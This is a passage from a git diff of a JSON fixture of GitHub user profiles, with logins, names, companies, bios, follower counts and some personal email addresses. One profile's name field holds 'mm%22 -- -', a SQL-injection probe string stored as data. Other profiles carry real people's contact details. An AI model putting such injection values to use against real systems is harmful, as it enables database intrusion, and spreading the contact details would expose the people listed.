"public_repositories_count": 109, - "created_at": "2012-05-16T23:00:54Z", - "updated_at": "2024-09-11T21:40:46Z", - "node_id": "MDQ6VXNlcjE3NDczNjM=", - "bio": "I love delivering results that transform businesses into sustainable market leadership.", + "following_count": 5, + "followers_count": 67, + "public_gists_count": 8, + "public_repositories_count": 196, + "created_at": "2010-04-22T17:56:21Z", + "updated_at": "2024-08-09T16:00:02Z", + "node_id": "MDQ6VXNlcjI1MDA3MQ==", + "bio": "Python, NGINX, and RPM enthusiast.", "is_hireable": true, - "twitter_username": "" + "twitter_username": "GetPageSpeed" } }, { "model": "github.user", - "pk": 990, + "pk": 6242, "fields": { - "nest_created_at": "2024-09-11T22:38:48.664Z", - "nest_updated_at": "2024-09-11T22:38:48.664Z", - "name": "", - "login": "unix196", + "nest_created_at": "2024-09-22T07:36:55.089Z", + "nest_updated_at": "2024-09-22T18:39:26.298Z", + "name": "David Buckle", + "login": "met3or", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10706486?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13330449?v=4", "company": "", - "location": "", + "location": "Manchester, United Kingdom", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2015-01-26T09:50:25Z", - "updated_at": "2023-10-06T05:18:36Z", - "node_id": "MDQ6VXNlcjEwNzA2NDg2", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-07-14T09:41:14Z", + "updated_at": "2024-08-02T08:34:35Z", + "node_id": "MDQ6VXNlcjEzMzMwNDQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385003,74 +641977,74 @@ }, { "model": "github.user", - "pk": 991, + "pk": 6243, "fields": { - "nest_created_at": "2024-09-11T22:38:49.952Z", - "nest_updated_at": "2024-09-11T22:38:49.952Z", - "name": "", - "login": "ralfmeister", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68286481?v=4", + "nest_created_at": "2024-09-22T07:36:55.398Z", + "nest_updated_at": "2024-09-22T18:39:26.609Z", + "name": "David CARLIER", + "login": "devnexen", + "email": "devnexen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4922778?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-07-14T14:03:11Z", - "updated_at": "2023-12-13T09:20:28Z", - "node_id": "MDQ6VXNlcjY4Mjg2NDgx", + "following_count": 88, + "followers_count": 176, + "public_gists_count": 4, + "public_repositories_count": 290, + "created_at": "2013-07-02T16:17:37Z", + "updated_at": "2024-09-21T09:25:16Z", + "node_id": "MDQ6VXNlcjQ5MjI3Nzg=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "devnexen" } }, { "model": "github.user", - "pk": 992, + "pk": 6244, "fields": { - "nest_created_at": "2024-09-11T22:38:51.607Z", - "nest_updated_at": "2024-09-11T22:38:51.607Z", - "name": "Daniel Sedlak", - "login": "wutchzone", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21202801?v=4", - "company": "CDN77", - "location": "Prague", + "nest_created_at": "2024-09-22T07:36:55.730Z", + "nest_updated_at": "2024-09-22T18:39:26.925Z", + "name": "David Kirstein", + "login": "frozenice", + "email": "david@kirstein.email", + "avatar_url": "https://avatars.githubusercontent.com/u/750902?v=4", + "company": "Batix Software GmbH", + "location": "Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 5, + "followers_count": 10, "public_gists_count": 2, - "public_repositories_count": 51, - "created_at": "2016-08-23T17:14:07Z", - "updated_at": "2024-08-28T12:29:05Z", - "node_id": "MDQ6VXNlcjIxMjAyODAx", - "bio": "Go, Rust, C/C++ programmer with a love for system programming, IoT, and 3D printing.", + "public_repositories_count": 5, + "created_at": "2011-04-25T19:18:57Z", + "updated_at": "2024-09-12T12:25:04Z", + "node_id": "MDQ6VXNlcjc1MDkwMg==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 993, + "pk": 6245, "fields": { - "nest_created_at": "2024-09-11T22:38:54.076Z", - "nest_updated_at": "2024-09-11T22:38:55.703Z", + "nest_created_at": "2024-09-22T07:36:56.048Z", + "nest_updated_at": "2024-09-22T18:39:27.240Z", "name": "", - "login": "drmuey", + "login": "EarlRoth", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1204812?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3310513?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, - "public_gists_count": 20, - "public_repositories_count": 55, - "created_at": "2011-11-18T16:17:53Z", - "updated_at": "2024-06-17T15:17:14Z", - "node_id": "MDQ6VXNlcjEyMDQ4MTI=", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-01-18T22:50:05Z", + "updated_at": "2024-06-04T14:44:48Z", + "node_id": "MDQ6VXNlcjMzMTA1MTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385078,24 +642052,24 @@ }, { "model": "github.user", - "pk": 994, + "pk": 6246, "fields": { - "nest_created_at": "2024-09-11T22:38:59.153Z", - "nest_updated_at": "2024-09-12T02:26:09.682Z", - "name": "Simon Studer", - "login": "studersi", + "nest_created_at": "2024-09-22T07:36:56.369Z", + "nest_updated_at": "2024-09-22T18:39:27.546Z", + "name": "Filip Sandborg", + "login": "filips", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6496203?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/176281?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, + "following_count": 1, "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2014-01-24T23:03:22Z", - "updated_at": "2024-09-10T10:22:42Z", - "node_id": "MDQ6VXNlcjY0OTYyMDM=", + "public_repositories_count": 14, + "created_at": "2010-01-04T18:45:04Z", + "updated_at": "2024-06-26T14:35:26Z", + "node_id": "MDQ6VXNlcjE3NjI4MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385103,49 +642077,74 @@ }, { "model": "github.user", - "pk": 995, + "pk": 6247, "fields": { - "nest_created_at": "2024-09-11T22:39:00.893Z", - "nest_updated_at": "2024-09-11T22:39:00.893Z", - "name": "", - "login": "satchidipu174", + "nest_created_at": "2024-09-22T07:36:56.687Z", + "nest_updated_at": "2024-09-22T18:39:27.858Z", + "name": "Fred Nicolson", + "login": "Cloaked9000", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46513294?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6798200?v=4", + "company": "@BeyondTrust ", + "location": "England", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2019-01-09T04:45:27Z", - "updated_at": "2024-01-19T22:38:06Z", - "node_id": "MDQ6VXNlcjQ2NTEzMjk0", + "following_count": 11, + "followers_count": 18, + "public_gists_count": 2, + "public_repositories_count": 19, + "created_at": "2014-02-26T21:06:16Z", + "updated_at": "2024-09-16T13:49:21Z", + "node_id": "MDQ6VXNlcjY3OTgyMDA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 996, + "pk": 6248, "fields": { - "nest_created_at": "2024-09-11T22:39:02.569Z", - "nest_updated_at": "2024-09-11T22:39:02.569Z", + "nest_created_at": "2024-09-22T07:36:56.990Z", + "nest_updated_at": "2024-09-22T18:39:28.172Z", "name": "", - "login": "amorozkin", + "login": "hyc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45874511?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/306354?v=4", + "company": "Symas Corp", "location": "", "collaborators_count": 0, + "following_count": 4, + "followers_count": 452, + "public_gists_count": 26, + "public_repositories_count": 66, + "created_at": "2010-06-16T01:39:45Z", + "updated_at": "2024-05-10T19:08:08Z", + "node_id": "MDQ6VXNlcjMwNjM1NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "hyc_symas" + } +}, +{ + "model": "github.user", + "pk": 6249, + "fields": { + "nest_created_at": "2024-09-22T07:36:57.310Z", + "nest_updated_at": "2024-09-22T18:39:28.492Z", + "name": "Jeff Trawick", + "login": "trawick", + "email": "trawick@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1207350?v=4", + "company": "Emptyhammock", + "location": "Raleigh, NC", + "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 42, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-12-14T11:41:29Z", - "updated_at": "2024-02-14T18:12:57Z", - "node_id": "MDQ6VXNlcjQ1ODc0NTEx", + "public_repositories_count": 55, + "created_at": "2011-11-19T23:39:30Z", + "updated_at": "2023-11-27T21:49:47Z", + "node_id": "MDQ6VXNlcjEyMDczNTA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385153,24 +642152,24 @@ }, { "model": "github.user", - "pk": 997, + "pk": 6250, "fields": { - "nest_created_at": "2024-09-11T22:39:06.360Z", - "nest_updated_at": "2024-09-11T22:39:06.360Z", + "nest_created_at": "2024-09-22T07:36:57.628Z", + "nest_updated_at": "2024-09-22T18:39:28.809Z", "name": "", - "login": "Minasu", + "login": "kukackajiri", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16954154?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6142520?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-01-29T09:11:36Z", - "updated_at": "2023-08-26T10:48:28Z", - "node_id": "MDQ6VXNlcjE2OTU0MTU0", + "public_repositories_count": 2, + "created_at": "2013-12-09T12:40:15Z", + "updated_at": "2016-02-27T12:47:36Z", + "node_id": "MDQ6VXNlcjYxNDI1MjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385178,24 +642177,24 @@ }, { "model": "github.user", - "pk": 998, + "pk": 6251, "fields": { - "nest_created_at": "2024-09-11T22:39:09.235Z", - "nest_updated_at": "2024-09-11T22:39:09.235Z", - "name": "", - "login": "rgvargas29", + "nest_created_at": "2024-09-22T07:36:58.280Z", + "nest_updated_at": "2024-09-22T18:39:29.473Z", + "name": "Kedu SCCL", + "login": "keducoop", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48107390?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42957183?v=4", "company": "", - "location": "", + "location": "Barcelona", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-02-28T22:31:37Z", - "updated_at": "2021-01-28T22:52:33Z", - "node_id": "MDQ6VXNlcjQ4MTA3Mzkw", + "public_repositories_count": 1, + "created_at": "2018-09-04T06:03:03Z", + "updated_at": "2024-08-09T08:44:35Z", + "node_id": "MDQ6VXNlcjQyOTU3MTgz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385203,24 +642202,24 @@ }, { "model": "github.user", - "pk": 999, + "pk": 6252, "fields": { - "nest_created_at": "2024-09-11T22:39:14.714Z", - "nest_updated_at": "2024-09-11T22:39:14.714Z", - "name": "", - "login": "SandakovMM", + "nest_created_at": "2024-09-22T07:36:58.590Z", + "nest_updated_at": "2024-09-22T18:39:29.787Z", + "name": "S. Kurt Newman", + "login": "skurtn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4586815?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5495174?v=4", + "company": "cPanel, Inc.", + "location": "Houston TX", "collaborators_count": 0, "following_count": 0, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2013-06-01T11:30:22Z", - "updated_at": "2024-09-03T09:15:42Z", - "node_id": "MDQ6VXNlcjQ1ODY4MTU=", + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2013-09-19T15:17:41Z", + "updated_at": "2016-10-14T18:38:44Z", + "node_id": "MDQ6VXNlcjU0OTUxNzQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385228,24 +642227,24 @@ }, { "model": "github.user", - "pk": 1000, + "pk": 6253, "fields": { - "nest_created_at": "2024-09-11T22:39:17.225Z", - "nest_updated_at": "2024-09-11T22:39:17.225Z", - "name": "Gianks", - "login": "gianks", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3036776?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:36:58.906Z", + "nest_updated_at": "2024-09-22T18:39:30.117Z", + "name": "Bali Bao", + "login": "leibaogit", + "email": "bali.baolei@cn.ibm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18115234?v=4", + "company": "IBM", + "location": "Shanghai, China", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2012-12-13T19:58:24Z", - "updated_at": "2023-07-16T18:37:12Z", - "node_id": "MDQ6VXNlcjMwMzY3NzY=", + "public_repositories_count": 18, + "created_at": "2016-03-28T11:04:54Z", + "updated_at": "2024-08-29T08:03:45Z", + "node_id": "MDQ6VXNlcjE4MTE1MjM0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385253,124 +642252,124 @@ }, { "model": "github.user", - "pk": 1001, + "pk": 6254, "fields": { - "nest_created_at": "2024-09-11T22:39:18.880Z", - "nest_updated_at": "2024-09-12T02:26:41.256Z", - "name": "", - "login": "azurit", + "nest_created_at": "2024-09-22T07:37:07.891Z", + "nest_updated_at": "2024-09-22T18:39:39.213Z", + "name": "Varun Pareek", + "login": "varunpareek690", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1083063?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/114807315?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 17, + "following_count": 11, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2011-09-27T07:32:48Z", - "updated_at": "2024-07-23T13:34:30Z", - "node_id": "MDQ6VXNlcjEwODMwNjM=", - "bio": "I'm security engineer with 20+ years of experience in the field of information security. Follow me if you like my work.\r\n", + "public_repositories_count": 14, + "created_at": "2022-10-01T10:19:35Z", + "updated_at": "2024-06-25T03:13:55Z", + "node_id": "U_kgDOBtfSEw", + "bio": "Coder | Beginner | Thrive to Learn | Thinker | Open to Contribute\r\n\r\nJAVA | PYTHON | C | HTML | CSS | JAVASCRIPT", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1002, + "pk": 6255, "fields": { - "nest_created_at": "2024-09-11T22:39:20.527Z", - "nest_updated_at": "2024-09-11T22:39:35.742Z", - "name": "Patrick Schleizer", - "login": "adrelanos", + "nest_created_at": "2024-09-22T07:37:17.904Z", + "nest_updated_at": "2024-09-22T18:39:49.525Z", + "name": "", + "login": "robmantium", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1985040?v=4", - "company": "@Kicksecure @Whonix", - "location": "online", + "avatar_url": "https://avatars.githubusercontent.com/u/137735406?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 279, - "public_gists_count": 8, - "public_repositories_count": 318, - "created_at": "2012-07-16T15:12:46Z", - "updated_at": "2024-08-04T20:06:57Z", - "node_id": "MDQ6VXNlcjE5ODUwNDA=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-06-26T00:08:05Z", + "updated_at": "2023-06-26T00:08:05Z", + "node_id": "U_kgDOCDWs7g", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1003, + "pk": 6256, "fields": { - "nest_created_at": "2024-09-11T22:39:26.386Z", - "nest_updated_at": "2024-09-11T22:39:26.386Z", + "nest_created_at": "2024-09-22T07:37:18.539Z", + "nest_updated_at": "2024-09-22T18:39:50.188Z", "name": "", - "login": "pgajdos", + "login": "PedroAVJ", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4067843?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/109568868?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-04-05T10:24:10Z", - "updated_at": "2024-08-28T08:57:36Z", - "node_id": "MDQ6VXNlcjQwNjc4NDM=", + "public_repositories_count": 3, + "created_at": "2022-07-19T03:23:18Z", + "updated_at": "2024-08-28T23:22:19Z", + "node_id": "U_kgDOBofjZA", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1004, + "pk": 6257, "fields": { - "nest_created_at": "2024-09-11T22:39:28.570Z", - "nest_updated_at": "2024-09-11T22:39:28.570Z", - "name": "Superman", - "login": "hygeiavvv", - "email": "php01@qq.com", - "avatar_url": "https://avatars.githubusercontent.com/u/40749820?v=4", + "nest_created_at": "2024-09-22T07:37:18.850Z", + "nest_updated_at": "2024-09-22T18:39:50.523Z", + "name": "", + "login": "joshjtaylor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24984462?v=4", "company": "", - "location": "郑州", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 2, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-07-02T03:38:33Z", - "updated_at": "2024-07-08T02:51:30Z", - "node_id": "MDQ6VXNlcjQwNzQ5ODIw", - "bio": "Can finally write bugs independently", + "public_repositories_count": 7, + "created_at": "2017-01-08T05:25:07Z", + "updated_at": "2023-11-30T19:49:21Z", + "node_id": "MDQ6VXNlcjI0OTg0NDYy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1005, + "pk": 6258, "fields": { - "nest_created_at": "2024-09-11T22:39:30.642Z", - "nest_updated_at": "2024-09-11T22:39:30.642Z", - "name": "Adam Stracener", - "login": "NeckBeardPrince", + "nest_created_at": "2024-09-22T07:37:19.169Z", + "nest_updated_at": "2024-09-22T18:39:50.830Z", + "name": "gs", + "login": "gjsutcliffe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6558867?v=4", - "company": "MRI NASA", - "location": "Brentwood, TN", + "avatar_url": "https://avatars.githubusercontent.com/u/76221391?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 79, - "followers_count": 19, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2014-02-01T02:00:11Z", - "updated_at": "2024-08-27T19:51:26Z", - "node_id": "MDQ6VXNlcjY1NTg4Njc=", + "public_repositories_count": 3, + "created_at": "2020-12-18T16:40:57Z", + "updated_at": "2024-01-15T23:29:21Z", + "node_id": "MDQ6VXNlcjc2MjIxMzkx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385378,24 +642377,24 @@ }, { "model": "github.user", - "pk": 1006, + "pk": 6259, "fields": { - "nest_created_at": "2024-09-11T22:39:32.292Z", - "nest_updated_at": "2024-09-11T22:39:32.292Z", - "name": "Andrei Belov", - "login": "defanator", + "nest_created_at": "2024-09-22T07:37:19.803Z", + "nest_updated_at": "2024-09-22T18:39:51.455Z", + "name": "Scott Benjamin", + "login": "scottbenjamin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1309027?v=4", - "company": "@F5Networks", - "location": "Dubai, UAE", + "avatar_url": "https://avatars.githubusercontent.com/u/22644?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 42, - "public_gists_count": 34, - "public_repositories_count": 107, - "created_at": "2012-01-06T09:57:46Z", - "updated_at": "2024-08-09T15:35:45Z", - "node_id": "MDQ6VXNlcjEzMDkwMjc=", + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2008-08-31T10:10:03Z", + "updated_at": "2024-09-06T04:58:01Z", + "node_id": "MDQ6VXNlcjIyNjQ0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385403,49 +642402,49 @@ }, { "model": "github.user", - "pk": 1007, + "pk": 6260, "fields": { - "nest_created_at": "2024-09-11T22:39:33.975Z", - "nest_updated_at": "2024-09-13T17:07:48.776Z", - "name": "Matteo Pace", - "login": "M4tteoP", - "email": "matteo@tetrate.io", - "avatar_url": "https://avatars.githubusercontent.com/u/26764726?v=4", - "company": "@tetrateio", - "location": "Torino, Italy (UTC +1/+2)", + "nest_created_at": "2024-09-22T07:37:25.810Z", + "nest_updated_at": "2024-09-22T18:44:06.613Z", + "name": "Saket Jajoo", + "login": "saketjajoo", + "email": "saketjajoo77@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23132557?v=4", + "company": "@Google, @googlecloudplatform", + "location": "", "collaborators_count": 0, - "following_count": 29, - "followers_count": 21, + "following_count": 49, + "followers_count": 20, "public_gists_count": 1, - "public_repositories_count": 39, - "created_at": "2017-03-29T10:06:12Z", - "updated_at": "2024-08-10T15:35:25Z", - "node_id": "MDQ6VXNlcjI2NzY0NzI2", - "bio": "Cloud, Meshy and Security things. Eng at @tetrateio | Maintainer at OWASP @corazawaf | Dev at OWASP @coreruleset.\r\n\r\nCybersecurity MSc @ Polytechnic of Turin.", - "is_hireable": false, - "twitter_username": "M4tteoP" + "public_repositories_count": 37, + "created_at": "2016-10-29T04:43:50Z", + "updated_at": "2024-09-22T16:51:20Z", + "node_id": "MDQ6VXNlcjIzMTMyNTU3", + "bio": "", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1008, + "pk": 6261, "fields": { - "nest_created_at": "2024-09-11T22:39:37.008Z", - "nest_updated_at": "2024-09-11T22:39:37.008Z", - "name": "", - "login": "mthbrown", + "nest_created_at": "2024-09-22T07:37:26.749Z", + "nest_updated_at": "2024-09-22T18:39:59.213Z", + "name": "QuincePie", + "login": "Quince-Pie", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22183215?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/127546159?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2016-09-13T23:28:28Z", - "updated_at": "2021-10-31T16:46:35Z", - "node_id": "MDQ6VXNlcjIyMTgzMjE1", + "public_gists_count": 3, + "public_repositories_count": 6, + "created_at": "2023-03-10T18:58:36Z", + "updated_at": "2024-09-03T03:22:30Z", + "node_id": "U_kgDOB5ozLw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -385453,149 +642452,149 @@ }, { "model": "github.user", - "pk": 1009, + "pk": 6262, "fields": { - "nest_created_at": "2024-09-11T22:39:38.292Z", - "nest_updated_at": "2024-09-11T22:39:38.292Z", - "name": "mm%22 -- -", - "login": "KernelPan1k", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3338681?v=4", - "company": "", - "location": "ee35e7c782791419f29316f183d5d6d3", + "nest_created_at": "2024-09-22T07:37:27.380Z", + "nest_updated_at": "2024-09-22T18:39:59.926Z", + "name": "Aman Sharma", + "login": "algomaster99", + "email": "mannu.poski10@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/35191225?v=4", + "company": "KTH Royal Institute of Technology", + "location": "Stockholm, Sweden", "collaborators_count": 0, - "following_count": 30, - "followers_count": 28, - "public_gists_count": 2, - "public_repositories_count": 53, - "created_at": "2013-01-22T12:21:04Z", - "updated_at": "2024-08-20T17:34:06Z", - "node_id": "MDQ6VXNlcjMzMzg2ODE=", - "bio": "LPIC / Pentest+ / KLCP / OSCP / OSWP / OSWE / CBBH", + "following_count": 121, + "followers_count": 153, + "public_gists_count": 20, + "public_repositories_count": 52, + "created_at": "2018-01-07T11:22:11Z", + "updated_at": "2024-09-19T11:50:10Z", + "node_id": "MDQ6VXNlcjM1MTkxMjI1", + "bio": "PhD student at KTH Royal Institute of Technology\r\n\"If a 5 year old can understand your research, you are already a world-expert.\"", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1010, + "pk": 6263, "fields": { - "nest_created_at": "2024-09-11T22:39:39.940Z", - "nest_updated_at": "2024-09-11T22:39:39.940Z", - "name": "Adarsh", - "login": "pandey-adarsh147", - "email": "adarsh.pandey@gonuclei.com", - "avatar_url": "https://avatars.githubusercontent.com/u/433217?v=4", - "company": "Nuclei", - "location": "", + "nest_created_at": "2024-09-22T07:37:27.690Z", + "nest_updated_at": "2024-09-22T19:36:30.806Z", + "name": "Fabian Affolter", + "login": "fabaff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/116184?v=4", + "company": "", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 10, - "followers_count": 20, - "public_gists_count": 9, - "public_repositories_count": 59, - "created_at": "2010-10-09T06:17:11Z", - "updated_at": "2024-08-23T07:01:21Z", - "node_id": "MDQ6VXNlcjQzMzIxNw==", - "bio": "", + "following_count": 5, + "followers_count": 637, + "public_gists_count": 15, + "public_repositories_count": 160, + "created_at": "2009-08-17T16:06:03Z", + "updated_at": "2024-09-01T11:21:23Z", + "node_id": "MDQ6VXNlcjExNjE4NA==", + "bio": "Just another engineer working on Fedora, the Fedora Security Lab and @NixOS. Sporadically also on @home-assistant and @alpinelinux. ", "is_hireable": true, - "twitter_username": "" + "twitter_username": "fabaff" } }, { "model": "github.user", - "pk": 1011, + "pk": 6264, "fields": { - "nest_created_at": "2024-09-11T22:39:42.423Z", - "nest_updated_at": "2024-09-11T22:39:42.423Z", - "name": "", - "login": "mig5", - "email": "mig@mig5.net", - "avatar_url": "https://avatars.githubusercontent.com/u/99173?v=4", - "company": "mig5 system administration", - "location": "Melbourne", + "nest_created_at": "2024-09-22T07:37:28.011Z", + "nest_updated_at": "2024-09-22T18:40:00.645Z", + "name": "Harshit Kochar", + "login": "harshit-kochar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111947316?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 21, - "public_repositories_count": 10, - "created_at": "2009-06-26T13:09:21Z", - "updated_at": "2024-08-28T21:38:27Z", - "node_id": "MDQ6VXNlcjk5MTcz", - "bio": "System administration as a service", + "following_count": 1, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-08-24T04:01:48Z", + "updated_at": "2024-09-13T11:59:49Z", + "node_id": "U_kgDOBqwuNA", + "bio": "Security Engineer II @ Postman", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1012, + "pk": 6265, "fields": { - "nest_created_at": "2024-09-11T22:39:43.663Z", - "nest_updated_at": "2024-09-11T22:39:43.663Z", - "name": "Taymindis Woon", - "login": "Taymindis", - "email": "taymindis@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/14217761?v=4", - "company": "CloudleStudio.com", - "location": "Singapore", + "nest_created_at": "2024-09-22T07:37:28.633Z", + "nest_updated_at": "2024-09-22T18:40:01.280Z", + "name": "Mateusz Konieczny", + "login": "matkoniecz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/899988?v=4", + "company": "", + "location": "Kraków, Poland", "collaborators_count": 0, - "following_count": 3, - "followers_count": 46, - "public_gists_count": 8, - "public_repositories_count": 59, - "created_at": "2015-09-10T12:44:07Z", - "updated_at": "2024-09-05T09:40:37Z", - "node_id": "MDQ6VXNlcjE0MjE3NzYx", - "bio": "A guy who work as a software architect in IT solution Company in Singapore. Proficient in security, scalability application", - "is_hireable": false, + "following_count": 11, + "followers_count": 158, + "public_gists_count": 25, + "public_repositories_count": 203, + "created_at": "2011-07-07T07:45:36Z", + "updated_at": "2024-09-16T19:59:30Z", + "node_id": "MDQ6VXNlcjg5OTk4OA==", + "bio": "A map enthusiast.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1013, + "pk": 6266, "fields": { - "nest_created_at": "2024-09-11T22:39:44.948Z", - "nest_updated_at": "2024-09-11T22:39:47.078Z", - "name": "Liu Dongmiao", - "login": "liudongmiao", - "email": "liudongmiao@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/473522?v=4", + "nest_created_at": "2024-09-22T07:37:28.941Z", + "nest_updated_at": "2024-09-22T18:40:01.596Z", + "name": "Sooraj Sathyanarayanan", + "login": "iAnonymous3000", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32236127?v=4", "company": "", - "location": "China", + "location": "Earth", "collaborators_count": 0, - "following_count": 15, - "followers_count": 352, - "public_gists_count": 7, - "public_repositories_count": 27, - "created_at": "2010-11-09T03:49:03Z", - "updated_at": "2024-09-10T05:24:56Z", - "node_id": "MDQ6VXNlcjQ3MzUyMg==", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 105, + "followers_count": 90, + "public_gists_count": 2, + "public_repositories_count": 48, + "created_at": "2017-09-24T07:31:52Z", + "updated_at": "2024-09-13T14:04:49Z", + "node_id": "MDQ6VXNlcjMyMjM2MTI3", + "bio": "Security & Privacy Researcher, Advocate for Open Source Software and Data Privacy, @nullNEU Chapter Lead", + "is_hireable": true, + "twitter_username": "iAnonymous3000" } }, { "model": "github.user", - "pk": 1014, + "pk": 6267, "fields": { - "nest_created_at": "2024-09-11T22:39:47.906Z", - "nest_updated_at": "2024-09-11T22:39:47.906Z", - "name": "", - "login": "regazzoj", - "email": "jeanbaptiste.regazzoni@protonmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6738167?v=4", + "nest_created_at": 